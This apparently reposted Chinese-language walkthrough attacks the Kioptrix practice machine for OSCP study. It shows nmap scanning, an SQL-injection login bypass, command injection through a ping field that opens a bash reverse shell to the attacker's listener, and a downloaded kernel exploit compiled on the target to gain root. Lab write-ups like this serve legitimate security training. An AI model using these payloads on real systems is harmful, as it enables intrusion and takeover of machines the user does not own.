靶机 IP 确定
-
先找到自己虚拟机的 IP 地址:
命令:
ifconfig
找到自己虚拟机 IP 地址是因为等会需要探测靶机的 IP,因为部署的时候本机和靶场在同一网段下
-
开始探测靶场地址:
命令:
nmap -sP 192.168.222.0/24
这里通过 IP 地址可以看出来最后一个属于我们自己的本机地址,但是我如何知道哪一个才是我们的靶场地址呢?
这里提供两种方法供各位看官去采纳:
方法一:先不打开靶机,先扫一次网段,记下所有的 ip 地址,然后再打开靶机,再扫一次,那么多出来的 IP 便是我们的靶机地址
方法二:对比现在扫出来的 Mac 地址,找到一样的就是我们的靶机了
这里因为时间关系,我就直对照 Mac 地址了
这是靶机的 Mac 地址
这是扫描过后发现所有的网段地址,比对 Mac 后成功找到靶机!
开始靶机探测
-
扫描靶机的详细信息
命令:
nmap -sT -sV -sC -O 192.168.222.131
命令解析
-
-sT: TCP Connect 扫描 -
使用完整的 TCP 连接扫描目标主机的端口。这种扫描方式通常用于没有管理员权限的情况下,因为它不需要直接操作原始套接字。 -
-sV: 服务版本检测- 尝试探测每个开放端口所运行的服务版本(如具体的 HTTP 服务器版本或 SSH 版本)。 -
-sC: 默认脚本扫描 -
运行一组 Nmap 默认的脚本( --script=default),包括常见的服务发现、版本检测和漏洞信息收集。 -
-O: 操作系统指纹检测 -
尝试通过网络特征信息推测目标主机所运行的操作系统。 -
192.168.222.131: 目标 IP 地址 -
您扫描的目标主机位于本地网络(192.168.222.0/24 子网)中,IP 地址为 192.168.222.131。
扫描的非常详细,发现一个http的80端口是打开的,那我们接下来在网页端访问一下看看。
这时候发现一个登录页面,那我们先试一下SQL注入,先试一下弱口令,失败了,那我们再试试别的
admin' or 1=1#
这时候发现成功进来了
可以看到它需要进行ping 但是没发现ping命令执行的地方,同时打开源码看一下。
这里发现他有一个input框没显示出来,发现是缺少了个单引号,那我们给它加上试试。
输入框也是完整的显示出来了
执行一下命令
执行成功了!
反弹shell
kali打开一个监听
nc -lvp 4444
命令执行反弹shell
127.0.0.1 && /bin/bash -c 'bash -i >& /dev/tcp/kaliIP地址/4444 0>&1'
反弹成功
查看一下用户和系统信息
whoami
lsb_release -a
阿帕奇的服务和CentOS release 4.5(Final)系统
接下来开始提权
先查找对应的exp
searchsploit CentOS 4.5
虽然没显示全,但是基本确定第二个可以利用
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
下载exp
searchsploit CentOS 4.5 -m 9542.c
传输
打开http服务或者Apache的服务都可以,之前靶机1我们选用的是http服务的80端口,那这次我们用Apache的服务来传递
打开服务
sudo systemctl status apache2
传递文件
mv 9542.c /var/www/html
让靶机下载提权文件
cd /tmp
wget http://192.168.222.130/9542.c
下载成功
编译文件
gcc 9542.c
添加执行权限,运行a.out
chmod 777 a.out
./a.out
提权成功!
原文始发于微信公众号(泷羽Sec-醉陌离):【OSCP+】Kioptrix 提权靶机(2)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论